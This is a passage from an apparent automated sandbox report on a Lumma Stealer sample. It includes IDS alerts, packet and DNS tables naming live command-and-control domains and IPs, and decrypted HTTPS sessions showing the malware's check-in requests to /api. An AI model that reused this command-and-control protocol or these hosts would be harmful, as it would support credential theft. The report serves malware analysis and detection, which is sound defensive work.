ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T15:29:17.263917+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	104.21.16.1	443	TCP
2025-01-12T15:29:17.745513+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49716	104.21.16.1	443	TCP
2025-01-12T15:29:17.745513+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49716	104.21.16.1	443	TCP
2025-01-12T15:29:18.227891+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49722	104.21.16.1	443	TCP
2025-01-12T15:29:18.651191+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49722	104.21.16.1	443	TCP
2025-01-12T15:29:18.651191+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49722	104.21.16.1	443	TCP
2025-01-12T15:29:19.750416+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49733	104.21.16.1	443	TCP
2025-01-12T15:29:20.352768+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49733	104.21.16.1	443	TCP
2025-01-12T15:29:20.991355+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49744	104.21.16.1	443	TCP
2025-01-12T15:29:22.293507+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49750	104.21.16.1	443	TCP
2025-01-12T15:29:23.841317+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49761	104.21.16.1	443	TCP
2025-01-12T15:29:24.834074+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49772	104.21.16.1	443	TCP
2025-01-12T15:29:25.839532+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49777	104.21.16.1	443	TCP
2025-01-12T15:29:26.328028+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49777	104.21.16.1	443	TCP
2025-01-12T15:29:27.167828+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49782	185.161.251.21	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 15:29:16.802392006 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:16.802479982 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:16.802563906 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:16.803654909 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:16.803692102 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.263854980 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.263916969 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.267591000 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.267602921 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.267955065 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.319858074 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.321100950 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.321100950 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.321304083 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.745523930 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.745770931 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.745853901 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.748270988 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.748322010 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.748353958 CET	49716	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.748369932 CET	443	49716	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.753654957 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.753746986 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:17.753829956 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.754100084 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:17.754141092 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.227684021 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.227890968 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.228831053 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.228858948 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.229826927 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.230928898 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.230969906 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.231039047 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651201010 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651343107 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651396990 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.651456118 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651671886 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651721001 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.651735067 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651823997 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651874065 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.651885986 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.651982069 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.652025938 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.652038097 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.652142048 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.652189970 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.652201891 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.655781984 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.655836105 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.655848026 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.710505009 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.710519075 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.739609003 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.739712954 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.739742041 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.739937067 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.740149021 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:18.740207911 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.756367922 CET	49722	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:18.756397963 CET	443	49722	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:19.245029926 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:19.245119095 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:19.245213032 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:19.245517969 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:19.245548964 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:19.750212908 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:19.750416040 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:19.751368999 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:19.751396894 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:19.751678944 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:19.753128052 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:19.753267050 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:19.753309965 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.352837086 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.353072882 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.353203058 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.353305101 CET	49733	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.353347063 CET	443	49733	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.528652906 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.528749943 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.528844118 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.529128075 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.529165030 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.991229057 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.991354942 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.992636919 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.992666960 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.992943048 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.994033098 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.994189978 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:20.994235992 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:20.994512081 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:21.035336971 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:21.598731041 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:21.598812103 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:21.598932981 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:21.599067926 CET	49744	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:21.599092960 CET	443	49744	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:21.839207888 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:21.839301109 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:21.839390993 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:21.839818954 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:21.839854002 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:22.293360949 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:22.293507099 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:22.295247078 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:22.295259953 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:22.295464039 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:22.296765089 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:22.296765089 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:22.296791077 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:22.296912909 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:22.296921968 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.006812096 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.006897926 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.006966114 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.007215977 CET	49750	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.007237911 CET	443	49750	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.358972073 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.359010935 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.359076023 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.359719038 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.359736919 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.841162920 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.841316938 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.853318930 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.853344917 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.853749037 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:23.854898930 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.854979992 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:23.854993105 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.314161062 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.314233065 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.314280987 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.314439058 CET	49761	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.314457893 CET	443	49761	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.372404099 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.372486115 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.372566938 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.372791052 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.372819901 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.833884954 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.834074020 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.835184097 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.835199118 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.835428953 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:24.836422920 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.836489916 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:24.836500883 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.360245943 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.360332012 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.360421896 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.360524893 CET	49772	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.360552073 CET	443	49772	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.363506079 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.363539934 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.363779068 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.364033937 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.364038944 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.839464903 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.839531898 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.840573072 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.840580940 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.841504097 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:25.842526913 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.842546940 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:25.842688084 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:26.328069925 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:26.328332901 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:26.328392029 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:26.328520060 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:26.328541040 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:26.328553915 CET	49777	443	192.168.2.5	104.21.16.1
Jan 12, 2025 15:29:26.328561068 CET	443	49777	104.21.16.1	192.168.2.5
Jan 12, 2025 15:29:26.438005924 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:26.438077927 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:26.438184977 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:26.438622952 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:26.438657045 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.167740107 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.167828083 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:27.169058084 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:27.169080973 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.169498920 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.170433998 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:27.211353064 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.431083918 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.431252956 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.431332111 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:27.443892956 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:27.443924904 CET	443	49782	185.161.251.21	192.168.2.5
Jan 12, 2025 15:29:27.443953037 CET	49782	443	192.168.2.5	185.161.251.21
Jan 12, 2025 15:29:27.443969965 CET	443	49782	185.161.251.21	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 15:29:01.660013914 CET	57395	53	192.168.2.5	1.1.1.1
Jan 12, 2025 15:29:01.668454885 CET	53	57395	1.1.1.1	192.168.2.5
Jan 12, 2025 15:29:16.780600071 CET	56506	53	192.168.2.5	1.1.1.1
Jan 12, 2025 15:29:16.797352076 CET	53	56506	1.1.1.1	192.168.2.5
Jan 12, 2025 15:29:26.331516981 CET	64243	53	192.168.2.5	1.1.1.1
Jan 12, 2025 15:29:26.437103033 CET	53	64243	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 15:29:01.660013914 CET	192.168.2.5	1.1.1.1	0xdcae	Standard query (0)	jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfO	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.780600071 CET	192.168.2.5	1.1.1.1	0x1029	Standard query (0)	goldyhanders.cyou	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:26.331516981 CET	192.168.2.5	1.1.1.1	0xd919	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 15:29:01.668454885 CET	1.1.1.1	192.168.2.5	0xdcae	Name error (3)	jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfO	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.797352076 CET	1.1.1.1	192.168.2.5	0x1029	No error (0)	goldyhanders.cyou		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.797352076 CET	1.1.1.1	192.168.2.5	0x1029	No error (0)	goldyhanders.cyou		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.797352076 CET	1.1.1.1	192.168.2.5	0x1029	No error (0)	goldyhanders.cyou		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.797352076 CET	1.1.1.1	192.168.2.5	0x1029	No error (0)	goldyhanders.cyou		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.797352076 CET	1.1.1.1	192.168.2.5	0x1029	No error (0)	goldyhanders.cyou		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.797352076 CET	1.1.1.1	192.168.2.5	0x1029	No error (0)	goldyhanders.cyou		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:16.797352076 CET	1.1.1.1	192.168.2.5	0x1029	No error (0)	goldyhanders.cyou		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 12, 2025 15:29:26.437103033 CET	1.1.1.1	192.168.2.5	0xd919	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

goldyhanders.cyou

cegu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:17 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: goldyhanders.cyou
2025-01-12 14:29:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-12 14:29:17 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=70ffcoq3sqlh4hscg2lb1af04t; expires=Thu, 08 May 2025 08:15:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4uKkW2yDNSEXK0Vl62tTRlQyhvpe9yBjk%2Buv5AgYq95s8XnHvCUPTGVNj9I7cIcT%2Fbj3An87%2B8OF%2BrV%2F1q7eT0D2RigBzku6Gm5UgPxCfpIzzYIatqOHMhFdXddeytq6MJwhkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd67f9a800fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1528&rtt_var=737&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3052&recv_bytes=908&delivery_rate=2866492&cwnd=253&unsent_bytes=0&cid=b5754f82fdca1ca4&ts=491&x=0"
2025-01-12 14:29:17 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-12 14:29:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49722	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:18 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: goldyhanders.cyou
2025-01-12 14:29:18 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a
2025-01-12 14:29:18 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=86r4ffk7hth92ff9012bsotdub; expires=Thu, 08 May 2025 08:15:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=El1Shk9nlm3y8vUXWFOrx%2FPUWoonAXeGFxPHAgS1dKe36osMw%2Fzogl0ErmNSk6uZamhvzLE6CLTDxuTrUmX86iehgXxxGBACEEOP%2FJaUq27hNNHYlU2m394ZZjaZZMGzxbXoXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd685587c41ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1648&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3053&recv_bytes=981&delivery_rate=2552447&cwnd=193&unsent_bytes=0&cid=fb2bd52b886e6506&ts=436&x=0"
2025-01-12 14:29:18 UTC	240	IN	Data Raw: 31 63 62 62 0d 0a 35 38 68 73 4e 50 51 7a 32 42 32 31 4c 68 51 48 6c 32 54 76 45 6f 30 6f 69 6d 6a 54 51 76 6b 36 54 48 4d 37 73 37 4d 2f 43 4c 71 63 36 68 6f 57 7a 67 66 30 50 38 5a 4c 4e 6a 33 78 42 59 4e 68 36 41 53 6f 43 62 64 67 77 31 77 74 48 30 6a 57 6e 78 31 2b 31 38 58 79 43 6c 57 59 51 4c 30 78 6c 30 74 73 4a 61 30 2f 6c 44 44 6f 52 71 68 53 38 53 65 54 57 43 30 66 57 64 4c 59 55 48 6a 57 68 4b 41 41 55 35 78 57 75 33 6e 55 51 6e 6c 69 38 67 47 4f 65 4f 4e 42 35 77 43 2b 59 4e 55 59 4b 51 6b 5a 69 5a 46 79 62 63 36 47 68 51 31 48 6e 78 47 6c 4d 63 34 4d 63 57 6d 31 58 73 31 7a 36 45 72 6d 44 72 63 70 6b 56 49 6b 46 31 6a 58 32 55 39 68 33 49 2b 67 44 6c 43 64 58 4c 4a 74 32 55 68 2b 61 66 51 4c 6a 6a Data Ascii: 1cbb58hsNPQz2B21LhQHl2TvEo0oimjTQvk6THM7s7M/CLqc6hoWzgf0P8ZLNj3xBYNh6ASoCbdgw1wtH0jWnx1+18XyClWYQL0xl0tsJa0/lDDoRqhS8SeTWC0fWdLYUHjWhKAAU5xWu3nUQnli8gGOeONB5wC+YNUYKQkZiZFybc6GhQ1HnxGlMc4McWm1Xs1z6ErmDrcpkVIkF1jX2U9h3I+gDlCdXLJt2Uh+afQLjj
